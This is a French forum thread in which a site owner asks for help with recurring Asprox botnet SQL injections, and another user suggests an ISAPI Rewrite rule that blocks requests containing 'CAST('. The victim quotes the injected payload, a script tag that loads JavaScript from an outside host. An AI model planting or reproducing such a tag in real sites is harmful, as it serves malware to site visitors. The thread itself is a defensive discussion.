Injection SQL - ASPROX BOTNET

Bonjour à tous,

Comme des millions de serveurs dans le monde, mon serveur est attaqué par des injections de SQL : du style
<script src=http://www.redir94.com/b.js></script>
à l'intérieur de mes champs dans la base de données.

voir
http://www.authsecu.com/news/315-news-securite-entreprise-renouveau-des-attaques-par-injection-sql-selon-ibm.htm
http://www.matchent.com/wpress/?q=node/309
http://www.eweek.com/c/a/Security/Botnet-Installs-SQL-Injection-Tool/

J'ai contrôlé les rq et mis une fonction anti injection pour chaque rq pouvant être attaquées, mais rien n'y fait. fonction : Fn_NoSqlInject

j'ai fait la recherche du trojan msscntr32.exe mais je ne l'ai pas trouvé.

Bref, mon site est continuellement attaqué et j'ai beau enlever les lignes de la table qui sont infectées, elles se réinfectent tous les jours.

Quelqu'un a une idée?

Merci pour votre aide

TBBUIM

Bonjour,

J'ai eu le même soucis pendant quelques jours.
Pour me débarrasser des attaques, j'ai utilisé une règle de réécriture (avec ISAPI Rewrite), demandant de stopper le chargement de la page si on détecte "cast(" dans le querystring.

RewriteRule .*CAST\(.* . [F,I]

Depuis, plus de soucis.

Cela n'empèche pas de sécuriser au maximum les requètes. Chez moi aussi, il  y avait du boulot... certaines pages étant écrites depuis presque 10 ans... !

Bon courage
Tom